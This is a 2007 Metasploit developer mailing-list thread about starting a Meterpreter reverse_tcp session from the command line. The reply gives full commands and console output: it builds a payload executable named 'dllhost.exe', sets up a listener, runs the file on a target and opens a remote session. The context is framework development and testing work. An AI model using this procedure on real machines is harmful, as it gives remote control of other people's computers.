Metasploit mailing list archives
Meterpreter from a command line
From: chaines at gmail.com (Chuck Haines)
Date: Wed, 28 Feb 2007 09:41:46 -0500
Excellent. I was so close it hurt as I almost had this done. By the way, I've implemented a nice recursive search feature in the meterpreter. I should share the code, but it still has a few bugs and could use some cleaning it. --chuck On 2/27/07, mmiller at hick.org <mmiller at hick.org> wrote:
Chuck, Client-side support for stdapi has not been implemented in C. However, you should be able to accomplish what you're asking by using the payload handler exploit. This will use Metasploit's builtin support for stdapi in ruby, and makes testing a whole lot easier. Note: make sure you svn update, a recent change had slightly changed the behavior of the payload handler which introduced some problems. Here's how to go about this: Step 1: Generate the executable that will act as the host for the meterpeter DLL. This executable hosts the first stage of the payload (the reverse connect): $ ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.4.79.2 X > dllhost.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 177 Options: LHOST=10.4.79.2 Step 2: Start the payload handler $ ./msfconsole ____________ < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ msf v3.0-beta-dev + -- --=[ 180 exploits - 104 payloads + -- --=[ 18 encoders - 5 nops =[ 31 aux msf > use multi/handler msf exploit(handler) > set LHOST 10.4.79.2 LHOST => 10.4.79.2 msf exploit(handler) > exploit [*] Started reverse handler [*] Starting the payload handler... Step 3: Run dllhost.exe on the target computer After running dllhost.exe, you should see this from msfconsole: [*] Transmitting intermediate stager for over-sized stage...(89 bytes) [*] Sending stage (2834 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (73739 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (10.4.79.2:4444 -> 10.4.79.102:3031) meterpreter > idletime User has been idle for: 8 secs meterpreter > Keep in mind that you can use the payload handler from msfcli too. Hope that helps. On Tue, Feb 27, 2007 at 01:16:21PM -0500, Chuck Haines wrote:Hello all, I'm trying to write an example of using the meterpreter from the command line. What I want to do is have an exe that start meterpreter and connects back to another machine. I have succesfully written the code that starts the meterpreter and connects back and it communicates just fine. However when I try and load the stdapi, it tells me it loads is succesfully, but doesn't actually give me the option of using it. Any help with this would be much appreciated. I'm using the metcli.exe that comes with the metepreter to listen for a connection and custom code to connect back to the metcli.exe and perform the init on the metsrv.dll. In the previous release (2.7), I had to modify the metcli so it knew about the stdapi (well back then fs, net, etc), but it seems that the client portion of the stdapi no longer exists and there is only a server portion. Is that because it was never written or am I missing something? If someone could give a way to use msfconsole and have it spawn a meterpreter reverse_tcp without having to do an expoit, that would be the best. Thanks, Chuck -- Chuck Haines chaines at gmail.com ----------------------------------------------------------- Tau Kappa Epsilon Fraternity Fraternity For Life Alumni http://www.tke.org irc://irc.deepspace.org/TKE ----------------------------------------------------------- Deepspace IRC NetAdmin Providing Web Services for the Disabled http://www.deepspace.org irc://irc.deepspace.org/Lobby -----------------------------------------------------------
-- Chuck Haines chaines at gmail.com ----------------------------------------------------------- Tau Kappa Epsilon Fraternity Fraternity For Life Alumni http://www.tke.org irc://irc.deepspace.org/TKE ----------------------------------------------------------- Deepspace IRC NetAdmin Providing Web Services for the Disabled http://www.deepspace.org irc://irc.deepspace.org/Lobby -----------------------------------------------------------
Current thread:
- Meterpreter from a command line Chuck Haines (Feb 27)
- Meterpreter from a command line mmiller at hick.org (Feb 27)
- Meterpreter from a command line Chuck Haines (Feb 28)
- Meterpreter from a command line mmiller at hick.org (Feb 28)
- Meterpreter strange hang max moser (Mar 01)
- Meterpreter strange hang mmiller at hick.org (Mar 01)
- Meterpreter from a command line Chuck Haines (Feb 28)
- Meterpreter from a command line mmiller at hick.org (Feb 27)